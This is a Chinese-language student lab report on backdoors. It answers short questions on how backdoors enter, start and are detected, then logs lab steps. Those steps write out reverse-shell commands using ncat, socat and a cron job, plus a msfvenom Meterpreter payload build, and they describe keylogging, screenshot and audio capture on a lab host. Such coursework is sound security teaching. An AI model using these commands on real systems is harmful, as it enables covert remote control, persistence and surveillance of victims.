1.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 软件中本身就含有后门
- 和软件进行捆绑,下载打开后进入系统
- 由于系统漏洞,主机被攻击了,从而被安装了后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- 让用户以为是正常的软件,启动软件时后门就启动。
- Linux定时任务系统 Cron,让使用者在固定时间或固定间隔执行程序。
- Win系统 用任务计划程序来定时自动运行程序
(3)Meterpreter有哪些给你映像深刻的功能?
- 记录键盘输入的字符
- 开启摄像头
(4)如何发现自己有系统有没有被安装后门?
- 系统运行速度突然变得缓慢:占用了内存和CPU资源,在后台运行了大量非法操作
- 检查系统对外开放的端口,看有没有可疑的进程使用某个端口传输数据。
netstat –an来查看所有TCP/UDP端口的连接
2.实验总结与体会
本次实验我学习了nc如何获取远程主机的Shell,使用msfenom生成后门可执行文件,然后尝试了一些Meterpreter常用功能,如记录键盘的输入,截屏,对网络系统的操作等。这一路做下来感觉太可怕,我们现在做的对于大神来说恐怕只是小case而已,提高安全意识从贴上摄像头开始...
3.实践过程记录
(1)使用netcat获取主机操作Shell,cron启动
win获得linux shell
-
win查看ip地址
-
win打开监听(这时需要允许防火墙访问)
-
linux反弹连接win
-
在在windows下就获得了linux的shell,可以运行linux下的指令,我选择运行ls命令尝试一下:
成功了
linux获得win shell
- 在kali中获取linux的ip
- 在win下反弹连接linux
输入c:\nc文件目录路径>ncat.exe -e cmd.exe 192.168.134.128 5201 - 连接上之后,在linux下可看到windows命令提示
cron启动
在linux终端输入crontab -e命令,可以修改用户的cron配置:
修改一下
此时,linux每分钟自动运行指令,反弹至win的5201端口。
可以使用命令crontab -l 查看查看配置文件
获取shell成功后,ls一下看看
(2)使用socat获取主机操作Shell, 任务计划启动
- windows使用socat获取kali shell:
kali上用socat tcp-listen:5201把cmd绑定到端口5201
并用socat tcp-l:5201 system:bash,pty,stderr反弹连接
windows使用socat readline tcp:192.168.134.129 5201开启监听
检测一下
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)
meterpreter
生成后门程序
- 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.26.155.4 LPORT=5201 -f exe > 5201lzx.exe来生成后门程序,然后用ncat方法发送到windows机中。
-
在Kali端用msfconsole指令进行msf设置,使用监听模块,设置payload,设置反弹回连的IP和端口。
-
运行 获取主机shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
-
用screenshot来截个图吧..
-
获取记录击键记录..
-
获取音频..
不过 提权失败了...